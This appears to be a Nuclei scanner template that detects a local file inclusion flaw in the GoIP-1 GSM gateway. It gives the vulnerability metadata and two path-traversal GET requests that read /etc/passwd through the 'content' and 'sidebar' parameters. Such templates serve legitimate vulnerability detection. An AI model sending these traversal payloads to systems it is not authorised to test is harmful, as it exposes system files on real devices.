id: goip-1-lfi

info:
  name: GoIP-1 GSM - Local File Inclusion
  author: gy741
  severity: high
  description: GoIP-1 GSM is vulnerable to local file inclusion because input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
  reference:
    - https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
    - http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
    - http://en.dbltek.com/latestfirmwares.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: gsm,goip,lfi,iot

requests:
  - method: GET
    path:
      - "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
      - "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

# Enhanced by mp on 2022/07/27